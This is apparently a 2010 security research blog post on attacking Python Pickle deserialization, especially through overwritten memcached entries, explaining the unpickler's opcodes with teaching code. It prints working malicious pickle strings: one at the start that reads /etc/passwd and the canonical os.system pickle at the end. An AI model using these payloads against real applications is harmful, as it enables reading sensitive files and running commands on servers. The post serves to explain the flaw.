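Because getattr is applied to the instance rather than to the class, no memo registers are needed in this version.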

That's enough Pickle for today, I'll leave you with a final modification of the above pickle string, that reads and returns the contents of files:

c__builtin__
file
(S"/etc/passwd"
tRp0
0c__builtin__
getattr
(c__builtin__
file
S"read"
tRp1
0c__builtin__
apply
(g1
(g0
ltR.

Tue, 9 Nov 2010

Playing with Python Pickle #1

In our recent memcached investigations (a blog post is still in the wings) we came across numerous caches storing serialized data. The caches were not homogenous and so the data was quite varied: Java objects, ActiveRecord objects from RoR, JSON, pre-rendered HTML, .Net serialized objects and serialized Python objects. Serialized objects can be useful to an attacker from a number of standpoints: such objects could expose data where naive developers make use of the objects to hold secrets and rely on the user to proxy the objects to various parts of an application. In addition, altering serialized objects could impact on the deserialization process, leading to compromise of the system on which the deserialization takes place.

In all the caches we examined, the most common data format found (apart from HTML snippets) was serialized Python and this prompted a brief investigation into the possible attacks against serialized Python objects. We've put together a couple of posts explaining how one might go about exploiting Pickle strings; the obvious vector is memcached however anytime Pickle strings are passed to an untrusted party the attacks described here become useful.


Python implements a default serialization technique called Pickle. Now I don't pretend to be a Pickle expert; Python is not my scripting language of choice for starters, and serialization is not a particularly interesting subject to me. However, seeing the following in any docs is cause for further digging:

A little further down the same page, we find a trivial example of how to execute code from a Pickle stream and a quick Google leads to a blog post in which Pickle insecurities are fleshed out in more detail. Both are worthwhile reads.

From these sources emerge the following factoids:

  • Pickle streams (or strings) are not simply data formats, they can reconstruct arbitrary Python objects.
  • Objects are described as a sequence of instructions and data stored in a stream of mostly 7-bit chars (newer versions of the Pickle protocol support 8-bit opcodes too).
  • The stream is deserialized by a simple virtual machine. Features of the machine are that it is stack-based, includes memo storage (these are registers accessible in any scope), and can call Python callables. There are no branching or looping instructions.
  • Once the virtual machine reaches the terminating instruction, the object on top of the stack is returned to the caller as the final deserialized object. Errors are produced if the stack is empty at that point, or if the instruction sequence is malformed or ends without a terminating instruction. The standard unpicklers do not complain about extra items left underneath the top of the stack, or about data following the terminator, but a well-formed stream leaves exactly one object behind.
  • Since Python 2.3, any semblance of protection in the Pickle code has been removed. Python developers have explicitly stated that the effort required to implement proper security in Pickle exceeds the usefulness of such an exercise and to underline this point they have removed all security controls that were present.
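To make the "sequence of instructions" point concrete, here is a minimal sketch that lists the opcodes inside an ordinary pickle. It assumes Python 3 and the standard `pickletools` module; the sample list is purely illustrative.

```python
import pickle
import pickletools

# Serialize an ordinary list with the text-based protocol 0.
data = pickle.dumps(["Hello", "World"], protocol=0)

# genops() walks the stream without executing it and yields
# (opcode, argument, position) for every instruction.
ops = [(op.name, arg) for op, arg, _pos in pickletools.genops(data)]
for name, arg in ops:
    print(name, repr(arg))
```

Even a plain list turns into a small program: a MARK, instructions that build the list and store memo entries, and a final STOP.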

This last point was particularly intriguing; developers purposely removed any semblance of security from the depickling mechanism and exhort users to never deserialize untrusted data. However, the memcached work showed that if one could find memcached instances, it was possible to overwrite data within the cache trivially. If the data inside a cache consists of Pickle strings, then by overwriting them an attacker is able to inject untrusted Pickle objects into a deserialization operation.
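The overwrite scenario can be sketched in a few lines. This is an illustration only: a plain dict stands in for a memcached instance, the key name is invented, and the injected pickle calls the harmless `len` rather than anything dangerous. It assumes Python 3, where the builtins module is named `builtins`.

```python
import pickle

cache = {}  # hypothetical stand-in for a memcached instance

# The application stores a pickled session object in the cache.
cache["session:42"] = pickle.dumps({"user": "alice"}, protocol=0)

# An attacker with write access to the cache replaces the value with a
# hand-written pickle that calls a function of their choosing.
cache["session:42"] = b"cbuiltins\nlen\n(S'attacker controlled'\ntR."

# The application later deserializes whatever it finds in the cache.
session = pickle.loads(cache["session:42"])
print(type(session), session)
```

The application expected a dict back; instead it received the return value of a call the attacker selected.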

We've had a bit of fun with this, seeing how far it can be pushed, and over the coming days I'll post three more entries on this topic. In the meantime, here's some background and a few simple examples to get things going.

Following along

In order to understand the Pickle objects below, you'll need to follow a few basic opcodes and their arguments:

  • c<module>\n<function>\n -> push <module>.<function> onto the stack. There are subtleties here, but for the most part it works.
  • ( -> push a MARK object onto the stack.
  • S'<string>'\n -> Push <string> object onto the stack.
  • V<string>\n -> Push Unicode <string> object onto the stack (unlike S, the argument is not wrapped in quotes).
  • l -> pop everything off the stack up to the topmost MARK object, create a list with the objects (excl MARK) and push the list back onto the stack
  • t -> pop everything off the stack up to the topmost MARK object, create a tuple with the objects (excl MARK) and push the tuple back onto the stack
  • R -> pop two objects off the stack; the top object is treated as the argument tuple and the lower object is a callable (function object). Apply the function to the arguments and push the result back onto the stack
  • p<index>\n -> Peek at the top stack object and store it in memo <index>.
  • g<index>\n -> Grab an object from memo <index> and push onto the stack.
  • 0 -> Pop and discard the topmost stack item.
  • . -> Terminate the virtual machine
With these simple instructions it's possible to execute arbitrary Python code, call OS commands and delve into the currently running Python process, as we'll show in the next couple of posts. I should also mention that the virtual machine supports a bunch of other instructions and these are well documented; however, for the sake of keeping things simple I've only mentioned instructions that we'll actually touch.
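To show how little machinery is involved, here is a toy interpreter for just the opcodes listed above. It is a sketch for illustration and not the real unpickler: the function name `run` is made up, string escapes are ignored, and module names follow Python 3 (`builtins` rather than `__builtin__`).

```python
import importlib

MARK = object()  # sentinel standing in for the MARK object


def run(stream):
    """Interpret a text pickle using only the opcodes listed above."""
    stack, memo, pos = [], {}, 0

    def read_line():
        # Return the argument up to the next newline and step past it.
        nonlocal pos
        end = stream.index("\n", pos)
        line = stream[pos:end]
        pos = end + 1
        return line

    def pop_to_mark():
        # Pop items down to the topmost MARK, preserving push order.
        items = []
        while True:
            top = stack.pop()
            if top is MARK:
                break
            items.append(top)
        items.reverse()
        return items

    while True:
        op = stream[pos]
        pos += 1
        if op == "c":
            module, name = read_line(), read_line()
            stack.append(getattr(importlib.import_module(module), name))
        elif op == "(":
            stack.append(MARK)
        elif op == "S":
            stack.append(read_line()[1:-1])  # strip the surrounding quotes
        elif op == "V":
            stack.append(read_line())
        elif op == "l":
            stack.append(pop_to_mark())
        elif op == "t":
            stack.append(tuple(pop_to_mark()))
        elif op == "R":
            args = stack.pop()
            func = stack.pop()
            stack.append(func(*args))
        elif op == "p":
            memo[read_line()] = stack[-1]
        elif op == "g":
            stack.append(memo[read_line()])
        elif op == "0":
            stack.pop()
        elif op == ".":
            return stack.pop()
        else:
            raise ValueError("unsupported opcode %r" % op)


print(run("cbuiltins\nlen\n(S'abc'\ntR."))
```

The `c` and `R` branches are the whole story from a security standpoint: one fetches any importable callable, the other calls it with arguments taken from the stream.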

Getting started

Testing out Pickle objects is pretty simple:

import pickle
str="""S'Hello world'
."""
pickle.loads(str)

(All the Pickle strings we'll play with can be substituted in for "str". Note that Pickle is sensitive to spacing and newlines, so don't introduce extras.)
The pickled data "S'Hello world'" simply instructs the VM to push a "Hello world" string object onto the stack. The final "." pops the stack and returns whatever is present.

An important instruction is the MARK opcode "(", which is used to signify frames on the stack. It is normally used in conjunction with opcodes that have to pop multiple objects off the stack, for example opcodes that build lists, tuples or dicts. The two examples below show how a list and a tuple are produced:

(S'Hello'
S'World'
l.




(S'Hello'
S'World'
t.
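For anyone following along on Python 3, a small sketch of the string, list and tuple examples is given here. It assumes only the standard `pickle` module; the one real difference from the Python 2 snippets is that `pickle.loads()` wants bytes, with the newlines written out as "\n".

```python
import pickle

# Each hand-written pickle is a bytes literal; "\n" marks the newlines
# that the opcodes' arguments require.
examples = {
    "string": b"S'Hello world'\n.",
    "list": b"(S'Hello'\nS'World'\nl.",
    "tuple": b"(S'Hello'\nS'World'\nt.",
}

results = {name: pickle.loads(raw) for name, raw in examples.items()}
for name, value in results.items():
    print(name, repr(value))
```

The only difference between the list and tuple streams is the single opcode that consumes everything back to the MARK.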



Final example

The canonical example given in a number of places including the official Python docs as to why unpickling untrusted data is bad is:

cos
system
(S'echo hello world'
tR.

The intent is clear; however, there are two interesting parts: decoding the instructions used, and realizing that for an attacker "hello world" isn't all that useful. In the next post I'll introduce the basics behind calling functions and see whether we can extend the canonical example into something a little more evil.
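As a head start on decoding the instructions, the canonical example can be inspected without running it. This sketch assumes Python 3 and the standard `pickletools` module, whose `genops()` only parses the stream and never imports or calls anything.

```python
import pickletools

canonical = b"cos\nsystem\n(S'echo hello world'\ntR."

# Each step is (opcode name, decoded argument); nothing is executed.
steps = [(op.name, arg) for op, arg, _pos in pickletools.genops(canonical)]
for name, arg in steps:
    print(name, repr(arg))
```

Read top to bottom, the stream pushes `os.system`, marks the stack, pushes the command string, folds it into a tuple, and then applies the function to that tuple.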